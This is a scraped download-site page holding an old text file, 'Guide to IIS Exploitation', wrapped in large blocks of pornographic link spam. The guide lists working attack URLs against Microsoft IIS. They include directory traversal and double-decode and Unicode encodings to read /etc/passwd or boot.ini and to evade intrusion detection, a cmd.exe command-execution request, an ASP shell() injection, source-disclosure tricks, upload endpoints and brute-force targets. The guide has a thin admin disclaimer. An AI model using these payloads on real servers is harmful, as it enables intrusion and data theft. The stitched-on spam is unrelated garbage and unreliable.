亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? guide to iis exploitation.txt

?? 黑客培訓教程
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
****************************************************************************                      Guide to IIS Exploitation                          **                            by fugjostle                                 **                                                                         **                             V.1.0.1                                     **                                                                         **          Questions? Comments? Email: fugjostle at ch0wn.com             ****************************************************************************    Disclaimer: I do not condone hacking IIS servers in any way,                 shape or form. This guide is intended as a guide                 for admins to help them understand what most                 script kiddies don't understand but are happy to                 exploit. --[On the first day, God created directory traversal]Relative paths are the developers friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, lets say we have a webpage called 'pictures.html' in the htdocs dir:  Absolute path:  /home/webpages/htdocs/pictures.html  Absolute path:  /home/webpages/images/pic1.gifIn the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:  Relative path: ../images/pic1.gifThe relative path tells the server that it has to go to the parent directory (dot dot) -->  from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem I hear you ask... well, the programmers of web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the servers directory structure and request files that the web server has access to. For example,  http://www.target.com/../../../etc/passwdNB. you can also use double dots and double quotes. This is useful to evadeIntrusion Detection Systems (IDS):  http://www.target.com//....//....//...././etc/./passwdThe webserver simply strips the extra stuff out and processes the request.This is the same as the previous example and can make string matching IDS'swork for their money.--[On the second day, God created Hexadecimal]Once programmers started to realise the mistake they began to create parser routines to check for naughty URL's and keep the requests within the document root. Then along comes a wiley hacker who wonders if by encoding the URL will it still be recognised by the parser routines.You may have noticed that when you enter a URL that includes a space it is replaced with the hex equivalent (%20):  http://www.target.com/stuff/my index.html  becomes  http://www.target.com/stuff/my%20index.htmland voila, it works. So what would happen if we changed the now denied URL:  http://www.target.com/../../../etc/passwd  to  http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.An interesting feature is that you can encode the hex symbol  and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:(1) On the first decode, the string will be converted to:  "http://victim.com/..%2f..%2fdocs/"  [%25 = '%' so '%252f' is decoded to '%2f'](2) On the second decode, the string will be converted to:  "http://victim.com/../../docs/"  [%2f = '/']--[On the third day, God created Unicode]The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:   -----------------------------------------------------------------   Unicode provides a unique number for every character, no matter    what the platform, no matter what the program, no matter what    the language. The Unicode Standard has been adopted by such    industry leaders as Apple, HP, IBM, JustSystem, Microsoft,    Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is    required by modern standards such as XML, Java, ECMAScript    (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official    way to implement ISO/IEC 10646. It is supported in many operating    systems, all modern browsers, and many other products.   -----from http://www.unicode.org---------------------------------The problem with Unicode is that it requires 16 bits for a single character and software tended to use 8 bits for a single character. Unicode TransForm using 8 bits (UTF-8) was created. This allows for multibyte encoding where a variable number of bytes can be used for each character:  Character  1-byte  2-byte  3-byte    .         2E      C0 AE   E0 80 AE    /         2F      C0 AF   E0 80 AF    \         5C      C1 9C   E0 81 9C This lead to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)For example:  www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwdRecent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:  www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dirUnderstanding the distinction between Unicode and UTF-8 can be difficult. Asa general rule of thumb you can use the following format as a guide:  %uxxxx          = Unicode  %xx%xx          = UTF-8  %xx             = Hexidecimal  %xxxx           = Double Decode--[On the fourth day, God created default installs]IIS comes installed with various DLL's (Dynamic Link Libraries) that increase the functionality of the web server. These ISAPI (Internet Server API) applications allow programmers/developers to deliver more functionality to IIS.The DLL's are loaded into memory at startup and offer significant speed over traditional CGI programs. For example, they can be combined with the Internet Database Connector (httpodbc.dll) to create interactive sites that use ODBC to access databases.The problem is that some of these DLL's are insecure and are often installed with sample scripts that demonstrate how to exploit, erm, I mean use them.ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active Server Pages) are basically HTML pages with embedded code that is processed by the webserver before serving it to the client. Here's some examples to illustrate how the sample pages installed by defaultcan aid someone breaking into your site via the ASP.DLL:[prefix all the examples with http://www.target.com]  /default.asp.   ** Appending a '.' to the URL can reveal the source    ** on older systems. Remember hex encoding? You can    ** also try using %2e to do the same thing.  /msadc/samples/adctest.asp   ** This gives you an interface into the msadcs.dll    ** and allows creation of DSN's. Read RFP's stuff   ** for idea's on how to exploit this.  /iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini  /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini   ** You can view the source of anything in the    ** document root. '/msadc/' needs to be in the    ** request as it is checked for, wait for this,   ** security :-)  /index.asp::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the ASP.  /index.asp%81     ** Append a hex value between 0x81 and 0xfe   ** and you can reveal the source of any server   ** processed file. This only works on servers   ** that are Chinese, Japanese or Korean.  /AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|   ** This one allows you to execute remote   ** shell commands ;-)ISM.DLL is used to process requests that end in ".htr". These pages were used to administer IIS3 servers. In IIS4 they are not used but various .htr samples are installed by default anyway and offer another avenue for entry.  /index.asp%20%20%20..(220 more)..%20%20.htr   ** IIS will redirect this request to ISM.DLL,   ** which will strip the '.htr' extension and   ** deliver the source code of the file.    /global.asa+.htr   ** Does the same thing as the %20%20 exploit   ** above. ISM.DLL strips the +.htr and delivers   ** you the source of the file  /scripts/iisadmin/ism.dll?http/dir   ** Excellent brute force opportunity if the   ** dll exists. Successful logons will reveal   ** lots of useful stuff.  /iisadmpwd/aexp.htr   ** The iisadmpwd diectory contains several .htr    ** files that allow NetBIOS resolution and    ** password attacks.  /scripts/iisadmin/bdir.htr??c:\inetpub\www   ** This method will only reveal directories   ** but can be useful for identifying the    ** servers structure for more advanced    ** attacks later.MSADCS.DLL is used to allow access to ODBC components via IIS using RDS (Remote Data Service). RDS is part of the default install of Microsoft Data Access Components (MDAC) and is a commonly exploited on IIS. It can allowarbitrary shell commands to be executed with system privileges.  /msadc/msadcs.dll   ** If this file exists then there's a pretty    ** good chance that you can run the RDS    ** exploit again the box. More on this later.HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the webserver wants to connect to a database. It allows the creation of web pagesfrom data in the database, and it allows you to update/delete items from within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLLfor processing.   /index.idc::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the IDC.  /anything.idc     ** Requesting a non-existance file will   ** reveal the location of the web root.  /scripts/iisadmin/tools/ctss.idc   ** Creates a table based on the parameters it    ** receives. Excellent place to look at for    ** SQL injection.SSINC.DLL is used for processing Server Side Includes (SSI). '.stm', '.shtm' and '.shtml' extension are sent to the DLL which interpretsthe SSI statements within the HTML before sending it to the client.An example of SSI would be:  <!--#include file="news.txt"-->This SSI tells the server to include the 'news.txt' in the final HTML sent to the use. SSI statements are beyond the scope of this document but offer another security hole open to our wiley hax0r. Ensure you remove the app mapping and disable SSI if you do not require its functionality.SSINC.DLL is also vulnerable to a remote buffer overflow, read the following advisory for details:  http://www.nsfocus.com/english/homepage/sa01-06.htmSome examples of SSINC.DLL fun:  /anything.stm   ** If you request a file that doesn't exist   ** then the server error message contains the   ** the location of the web root.  /somedir/anything.stm/somedir/index.asp   ** Using this method allows you to view the   ** the source code for index.asp.   IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'requests. This DLL has had some big exposure with the recent Nimda worm. I'm not going into too much detail but '.ida' was used in a buffer overflow that resulted in user defined code being executed on the server.  /anything.ida or /anything.idq     ** Requesting a non-existance file will   ** reveal the location of the web root.  /query.idq?CiTemplate=../../../boot.ini   ** You can use this to read any file on   ** the same drive as the web rootCPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your IIS server, via a web browser or the Web Publishing Wizard. The existance of this DLL can allow attackers upload files to the server. Other files such asuploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with SiteServer and allow upload of documents to the server:  /scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp   ** If this file is there then you may be able   ** to upload files to the server.  /scripts/uploadn.asp     ** Connecting to this page gives you a nice   ** gui for uploading your own webpages. You   ** probably need to brute the userid.There are lots more example scripts in the default install and quite a few of them are very, very insecure. Microsoft recommends that you remove ALL samples from any production server including the ExAir, WSH, ADO and other installed samples.  IIS Default Web Site  --------------------  IISSAMPLES  - c:\inetpub\iissamples  IISADMIN    - c:\winnt\system32\inetsrv\issadmin  IISHELP     - c:\winnt\help  SCRIPTS     - c:\inetpub\scripts  IISADMPWD   - c:\winnt\systems32\inetsrv\iisadmpwd  msadc       - c:\program files\common files\system\msadc  logfiles    - c:\winnt\system32\logfiles  default.htm - c:\inetpub\wwwroot  IIS Default App Mapping  -----------------------  .asa   - c:\winnt\system32\inetsrv\asp.dll  .asp   - c:\winnt\system32\inetsrv\asp.dll  .cdx   - c:\winnt\system32\inetsrv\asp.dll  .cer   - c:\winnt\system32\inetsrv\asp.dll  .htr   - c:\winnt\system32\inetsrv\ism.dll  .idc   - c:\winnt\system32\inetsrv\httpodbc.dll  .shtm  - c:\winnt\system32\inetsrv\ssinc.dll  .shtml - c:\winnt\system32\inetsrv\ssinc.dll

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲欧洲精品天堂一级| 日韩欧美在线123| 久99久精品视频免费观看| 亚洲一级不卡视频| 洋洋av久久久久久久一区| 伊人色综合久久天天人手人婷| 国产精品美女久久久久久 | 在线视频你懂得一区| 成人app网站| 国产白丝精品91爽爽久久| 国产精品一区二区x88av| 国产99精品视频| 色综合中文字幕国产| 成人综合在线观看| 99re热这里只有精品视频| 在线一区二区三区四区| 欧美久久久久久久久中文字幕| 精品视频在线视频| 精品国精品国产尤物美女| 欧美r级电影在线观看| 国产欧美日产一区| 亚洲精品日韩一| 日本va欧美va精品| 国产成人免费视频网站 | 欧美aⅴ一区二区三区视频| 免费成人在线观看| 国产成a人无v码亚洲福利| 成人开心网精品视频| 欧日韩精品视频| 精品区一区二区| 亚洲欧美一区二区视频| 日韩av中文字幕一区二区三区| 精品一区二区在线视频| 99精品桃花视频在线观看| 在线精品视频一区二区三四 | 国内外成人在线| av亚洲精华国产精华精华| 欧美撒尿777hd撒尿| 久久综合久久99| 一区二区三区在线高清| 久久99精品视频| 日本道色综合久久| 久久久久99精品国产片| 亚洲麻豆国产自偷在线| 久久se这里有精品| 一本久道中文字幕精品亚洲嫩 | 男人的j进女人的j一区| 成人18精品视频| 日韩一区二区在线观看视频播放| 国产精品无码永久免费888| 日精品一区二区三区| 成人国产精品免费观看视频| 日韩欧美自拍偷拍| 一区二区三区四区高清精品免费观看| 麻豆成人久久精品二区三区红| 97se狠狠狠综合亚洲狠狠| 久久久久久日产精品| 久久99国产精品久久99果冻传媒| 国产91在线观看| 精品日产卡一卡二卡麻豆| 亚洲第四色夜色| 色婷婷久久久综合中文字幕| 欧美激情在线一区二区| 久久er精品视频| 欧美一区二区三区在线电影| 亚洲精品伦理在线| 91亚洲永久精品| 中文字幕亚洲电影| 国产ts人妖一区二区| 精品国产乱码久久久久久影片| 亚洲成人免费影院| 欧美丝袜自拍制服另类| 亚洲精品国产品国语在线app| 99视频精品免费视频| 国产免费成人在线视频| 国产成人免费视| 欧美国产一区视频在线观看| 美女视频黄 久久| 日韩欧美色电影| 精品无人区卡一卡二卡三乱码免费卡| 日韩一区二区麻豆国产| 免费人成在线不卡| 欧美一区二区三区在线电影| 欧美96一区二区免费视频| 欧美一区二区视频在线观看2020 | 色婷婷国产精品| 亚洲美女一区二区三区| av亚洲精华国产精华精华| 中文字幕日韩一区二区| 91免费看片在线观看| 亚洲乱码国产乱码精品精可以看| av在线一区二区三区| 一区二区三区丝袜| 51精品视频一区二区三区| 琪琪久久久久日韩精品| 精品久久久三级丝袜| 国产精品香蕉一区二区三区| 国产精品成人一区二区艾草 | 国产福利视频一区二区三区| 国产亚洲午夜高清国产拍精品| 国产精品一区免费在线观看| 国产精品日日摸夜夜摸av| 91老师片黄在线观看| 亚洲成人午夜影院| 久久尤物电影视频在线观看| 成人三级在线视频| 一区二区三区欧美日| 欧美一二三四在线| 成人综合婷婷国产精品久久免费| 亚洲天堂精品视频| 欧美一区二区视频在线观看 | 欧美亚洲高清一区二区三区不卡| 日韩专区在线视频| 国产人妖乱国产精品人妖| 色综合婷婷久久| 美国欧美日韩国产在线播放| 国产嫩草影院久久久久| 欧美视频在线观看一区| 国产另类ts人妖一区二区| 亚洲视频免费在线| 中文字幕在线观看不卡| 制服丝袜av成人在线看| 国产91精品入口| 日韩电影一二三区| 一区二区三区蜜桃网| 久久久久久久网| 91精品麻豆日日躁夜夜躁| 成人精品免费网站| 精彩视频一区二区| 同产精品九九九| 亚洲另类春色校园小说| 久久久天堂av| 欧美一级黄色片| 欧美顶级少妇做爰| 在线观看av一区二区| 成人精品一区二区三区四区| 激情av综合网| 精油按摩中文字幕久久| 亚洲va国产va欧美va观看| 亚洲精品高清在线| 国产精品成人在线观看| 国产无一区二区| 久久久久久久性| 日韩一区二区三区免费看| 欧美日韩免费在线视频| 91麻豆.com| 在线免费一区三区| 一本一道久久a久久精品综合蜜臀| 国产一区二区免费看| 裸体一区二区三区| 另类小说一区二区三区| 麻豆久久一区二区| 久久成人免费网站| 久久精品国产免费| 精品午夜久久福利影院| 麻豆91免费看| 国产一区欧美日韩| 国产福利91精品一区二区三区| 精品一区二区三区免费视频| 久久99国产乱子伦精品免费| 九九九精品视频| 国产高清成人在线| 岛国一区二区在线观看| www.日韩av| 欧美三级中文字| 日韩欧美高清一区| 久久无码av三级| 国产欧美日韩亚州综合| 中文字幕视频一区| 亚洲线精品一区二区三区八戒| 午夜精品久久久久久久99水蜜桃 | 日韩在线a电影| 蜜桃视频第一区免费观看| 国产一区亚洲一区| 成人黄色一级视频| 色猫猫国产区一区二在线视频| 欧美日韩在线播放三区四区| 91精品久久久久久久99蜜桃| 欧美v日韩v国产v| 国产精品每日更新| 午夜影视日本亚洲欧洲精品| 日韩福利视频网| 国内精品久久久久影院薰衣草| 国产91精品一区二区麻豆网站| 91女神在线视频| 欧美一级欧美三级在线观看 | 成人app在线观看| 欧美精品v国产精品v日韩精品| 日韩欧美一级精品久久| 国产精品毛片无遮挡高清| 亚洲va在线va天堂| 高清成人免费视频| 欧美精品777| 成人欧美一区二区三区1314| 亚洲123区在线观看| 成人高清视频免费观看| 69堂成人精品免费视频| 国产精品久久久久婷婷 | 欧美大尺度电影在线| 亚洲同性gay激情无套|